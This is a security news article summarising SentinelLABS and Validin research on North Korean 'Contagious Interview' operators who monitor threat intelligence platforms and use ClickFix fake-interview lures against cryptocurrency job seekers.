SentinelLABS Reveals How North Korean “Contagious Interview” Operators Abuse Threat Intel Platforms

The SentinelLABS intelligence team, in collaboration with Validin, has published an in-depth analysis of North Korean-aligned actors exploiting cyber threat intelligence (CTI) platforms to monitor their own exposure, scout for new infrastructure, and refine their operations. The findings shed light on how the group behind the Contagious Interview campaign—linked to the Lazarus umbrella cluster—leverages public CTI resources while deploying the ClickFix social engineering technique to compromise victims.

According to SentinelLABS, “North Korea-aligned threat actors actively monitor cyber threat intelligence to detect infrastructure exposure and scout for new assets.”

Between March and June 2025, researchers observed the Contagious Interview operators registering accounts on Validin, an internet intelligence platform, just hours after the company published a blog post about Lazarus infrastructure. The threat actors used Gmail accounts already tied to previous operations, suggesting deliberate coordination.

Although blocked quickly, they persisted—switching to new domains like versusx[.]us and quiz-nest[.]com to regain access. As the report explains, “We observed that the Contagious Interview threat actors engaged in coordinated activity and likely operated in teams to investigate threat intelligence related to their infrastructure and to monitor for signs of detection.”

Indicators even suggest that the group used Slack for real-time collaboration, with links to CTI searches shared across multiple accounts in quick succession.

Despite carefully checking CTI sources like Validin, VirusTotal, and Maltrail, the attackers made only sporadic changes to their infrastructure. Instead, they focused on rapidly deploying new assets whenever service providers took down old ones.

SentinelLABS notes: “This indicates a strategic focus on continuously replacing disrupted infrastructure with new assets to sustain operations and high victim engagement.”

OPSEC failures also provided researchers with unusual insights. Some malware servers inadvertently exposed directory contents and error logs, revealing usernames, deployment timelines, and even ContagiousDrop applications used to distribute malware.

Contagious Interview campaigns are best known for their ClickFix lure, which exploits job seekers. Victims are invited to bogus interviews, prompted to run commands like curl under the guise of fixing a “camera error,” and end up downloading malware from attacker-controlled servers.

The servers deliver operating system–specific payloads (Windows, macOS, Linux) and notify operators by email whenever victims engage.

Log files exposed by Contagious Interview infrastructure revealed over 230 victims between January and March 2025 alone. SentinelLABS stresses that the real number is likely far higher.

Targets were primarily linked to the cryptocurrency and blockchain industry, working in roles such as Portfolio Manager, Investment Manager, and Senior Product Manager. Impersonated companies included Robinhood, Archblock, and eToro .

This aligns with North Korea’s broader strategy of using cyber operations to generate revenue for sanctions evasion and weapons development.

Related Posts:

• The Fake Crypto Bot Scam: How Smart Contracts & AI Videos Are Stealing Millions on YouTube
• Lazarus APT Targets Job Seekers with “Contagious Interview” Campaign Using ClickFix Technique
• North Korean Threat Actors Targeting Tech Job Seekers with Contagious Interview Campaign
• North Korean Hackers Launch Job Interview Scam to Deploy BeaverTail and InvisibleFerret Malware